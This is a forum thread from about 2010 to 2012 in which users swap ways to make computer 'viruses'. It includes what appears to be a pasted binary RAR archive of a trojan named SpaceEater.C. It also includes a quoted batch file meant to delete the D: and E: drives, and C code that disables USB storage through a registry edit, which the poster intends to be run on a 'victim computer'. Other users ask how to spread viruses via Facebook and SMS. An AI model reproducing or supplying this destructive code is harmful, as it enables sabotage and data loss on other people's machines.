Light Poster
30Apr2010,18:50   #11
kalo's Avatar
could you remove the code of that trojan horse virus
Rar! ϐs
=t 1  Œ 7€„:3 SpaceEater.C Ÿ† 
[€ƒTASq[#K[ju&‡j„SFINs…z*cœkgRMru_‘-œ‡Q?8wt“„$ č €=U*N†m+'š0!Ӭ߸`–V
B*' Ž„&‘Š^N
TZ8a)‰$ŒR"OSj~Ʋo#<‘uac•d 6)0 Œbb*GXDœ{ڿœ? ˆ„"h<Q t*ˆ\ZD Bg$ɸj‡ž‚2‘U‡š1?g ™Šs –OZ|bFFG3f{L‡z%v¦4Q‰‘Ͽw6/c,]=s$“*my<s/o3……杦F^n‘u*Ÿ=‹(†0daMmš…Xmt^D f„[lB™(›G[f)‹deY’5‚7TQ9„]#L_F5KA[?c׬Ӹ'q#hByzŠ_ŒC練”„pG2v63Ν B6QQ™m‹@4vv)Q_*Hץ1-Ž
‡„„ž˜
8ߨF)‰‘Ÿ y&†K&PgIkӲ/ɼ D6E˜N'—Œz‘L&8Š ZC‹@9ĺyžlÝ“+pHQ KFt^ P4F/, (VS]E—,Yš=Sf€‰{šxc,Hɍ’IэO~*‹W…‡ 8'WUt;3„*e†I %jA35!L' %žG{W\ˆ:g†k •T%wRHw]X#~D?lE=g(q@(8d:⨐"(‘“0ˆfbDŸ A)x:‘S}‹k‰;™۾+Ǿsߺ8LgQNž `Mi]'O2/l+ta]/ƒ‘
R^3P֫–X
Q 7۶ƒzS’>œGdԽ™)’J-W‘*~8.Y?.~#Oeb~6 ,HcŠh†l{#NԺŽ[.0Š}|6Tƒ4‚pJƒ1Ԩi’N,€Vui_ *A*ŽN2D W z)Ÿ3+ƒQlHcy >J<3Ÿ3Š7h›W6D* “XƱpF%’`18V€_@={ @
Light Poster
30Apr2010,18:52   #12
kalo's Avatar
i mean the warning code from the warning code
Newbie Member
7May2010,16:53   #13
Xprrepie's Avatar
Nice!!! =)))
Newbie Member
8May2010,12:10   #14
Ranjan_Singh's Avatar
Quote:
Originally Posted by satyedra pal View Post
you can create another computer virus by using following code writing on notepad:

@echo off

DEL D: -Y
DEL E: -Y

now you can save it as filename.bat

These virus will format your hardderive as given the name of derive.

It is not a virus.
It is just a command program for deletion of data of respective derive.
Contributor
10May2010,16:29   #15
satyedra pal's Avatar
Any computer program that damages or give any problem with user work is a virus.
Newbie Member
22May2010,16:13   #16
killercode's Avatar
no kolo tell me how 2 create virus on facebook
Newbie Member
23May2010,14:22   #17
master_d's Avatar
to have a virus like effect you can block the usb ports by using c-language code.
here is the code to block usb:
#include<stdio.h>

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Ser vices\\USBSTOR \/v Start \/t REG_DWORD \/d 4 \/f");
}

/*use it own your own risk */

/* if you are able to create .exe file after execution and you are able to run it on victim computer then that will work as virus for him which has block victim usb . leave comment */



i am new user.
Newbie Member
23May2010,14:28   #18
master_d's Avatar
to unblock usb:
#include<stdio.h>

void main()
{
system("reg add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Ser vices\\USBSTOR \/v Start \/t REG_DWORD \/d 3 \/f");
}

/* use it on your own risk */

!!!!!!!!!!!!!!!!! enjoy !!!!!!!!!!!!
Newbie Member
9Feb2012,21:46   #19
binnie200798's Avatar
can anyone give me details on how to send a virus thru text messaging via computer to cell phone if its possible or thru a text on fb? thanks!!!